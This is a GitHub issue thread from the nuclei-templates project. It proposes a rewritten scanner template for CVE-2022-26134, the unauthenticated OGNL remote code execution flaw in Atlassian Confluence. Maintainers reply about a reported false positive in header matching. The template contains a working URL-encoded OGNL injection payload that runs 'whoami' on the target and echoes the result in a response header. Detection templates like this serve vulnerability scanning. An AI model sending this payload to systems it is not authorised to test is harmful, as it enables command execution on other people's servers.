nuclei-templates icon indicating copy to clipboard operation
nuclei-templates copied to clipboard

CVE-2022-26134

Open BetterDefender opened this issue 2 years ago • 6 comments

Template Information:

CVE-2022-26134 Confluence - OGNL Remote Code Execution reference: - https://attackerkb.com/topics/BH1D56ZEhs/cve-2022-26134/rapid7-analysis - https://confluence.atlassian.com/doc/confluence-security-advisory-2022-06-02-1130377146.html - https://www.rapid7.com/blog/post/2022/06/02/active-exploitation-of-confluence-cve-2022-26134/ - https://jira.atlassian.com/browse/CONFSERVER-79016

Nuclei Template:

id: CVE-2022-26134

info:
  name: Confluence - OGNL Remote Code Execution
  author: gh0st
  severity: critical
  description: |
    Confluence Server and Data Center is susceptible to an unauthenticated remote code execution vulnerability.
  reference:
    - https://attackerkb.com/topics/BH1D56ZEhs/cve-2022-26134/rapid7-analysis
    - https://confluence.atlassian.com/doc/confluence-security-advisory-2022-06-02-1130377146.html
    - https://www.rapid7.com/blog/post/2022/06/02/active-exploitation-of-confluence-cve-2022-26134/
    - https://jira.atlassian.com/browse/CONFSERVER-79016
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 9.8
    cve-id: CVE-2022-26134
    cwe-id: CWE-74
  metadata:
    shodan-query: http.component:"Atlassian Confluence"
    verified: "true"
  tags: cve,cve2022,confluence,rce,ognl,oast,kev

requests:
  - method: GET
    path:
      - "{{BaseURL}}/%24%7B%28%23a%3D%40org.apache.commons.io.IOUtils%40toString%28%40java.lang.Runtime%40getRuntime%28%29.exec%28%22whoami%22%29.getInputStream%28%29%2C%22utf-8%22%29%29.%28%40com.opensymphony.webwork.ServletActionContext%40getResponse%28%29.setHeader%28%22X-Cmd-Response%22%2C%23a%29%29%7D/"
    matchers-condition: and
    matchers:
      - type: word
        part: header
        words:
          - "X-Cmd-Response"

BetterDefender avatar Feb 09 '23 09:02 BetterDefender

Hi team, the currently existing CVE-2022-26134.yaml file is not working properly, I have rewritten this POC and hope it can be updated, thanks.

BetterDefender avatar Feb 09 '23 09:02 BetterDefender

Hello @BetterDefender, we apologize for the longer-than-usual response time regarding this issue. We appreciate the time and effort you took to create it. The team will review it shortly. Cheers! 🍻

princechaddha avatar Apr 21 '23 10:04 princechaddha

Hi team, the currently existing CVE-2021-24351.yaml file is not working properly, I have rewritten this POC and hope it can be updated, thanks.

Hello @BetterDefender, can you please specify which template you are facing an issue with? because the issue you have created is for the CVE-2022-26134 - Confluence - OGNL Remote Code Execution which is a duplicate of this template. Also, in your above comment you have mentioned the CVE-2021-24351

ritikchaddha avatar Jul 04 '23 19:07 ritikchaddha

Sorry, I said the wrong CVE number in my previous reply, the one that needs to be changed is CVE-2022-26134.yaml.

BetterDefender avatar Sep 05 '23 14:09 BetterDefender

Can you mention the issues you are facing with the current template we have? Surely, we'll help you with that.

ritikchaddha avatar Sep 05 '23 14:09 ritikchaddha

Since it's been so long, I'm a bit hard to remember, but the Payload used in the POC for the vulnerability would add X-Cmd-Response to the response header, but when matching it matches lowercase letters, which led to false positives when I was testing the site with the vulnerability, and after modifying the yaml content, the vulnerability was successfully detected. image

BetterDefender avatar Sep 05 '23 14:09 BetterDefender

Hello @BetterDefender, We have tried replicating this issue, and this should not cause any false positive results because the dsl matcher is working as intended by changing the response header matcher into the lower case contains(to_lower(header_1), "x-cmd-response:") and showing the result as expected.

ritikchaddha avatar Apr 16 '24 16:04 ritikchaddha

I actually did experience a false alarm for that reason, so I submitted a question about it, and I'll keep you posted if I encounter it again in the future, thanks for the reply!

BetterDefender avatar Apr 19 '24 07:04 BetterDefender